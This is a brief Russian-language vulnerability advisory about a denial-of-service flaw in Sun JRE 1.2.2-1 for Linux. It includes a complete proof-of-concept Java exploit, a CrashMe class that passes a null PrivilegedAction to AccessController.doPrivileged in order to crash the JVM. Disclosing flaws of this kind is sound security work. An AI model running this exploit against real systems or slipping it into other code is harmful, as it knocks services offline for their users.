Программы Java работают в виртуальной среде, называемой Java Virtual Machine (JVM).
Java-программа определенной конструкции может разрушить виртуальную машину Sun. Уязвимость может
привести к отказу от обслуживании, в
частности эта уязвимость демонстрировалась на Linux-версии Sun JVM.
Уязвимость найдена в Sun JRE (Linux Production Release) 1.2.2-1
Эксплоит:
public class CrashMe
{
public static void main(String[] args)
{
java.security.AccessController.doPrivileged
((java.security.PrivilegedAction)null);
}
}
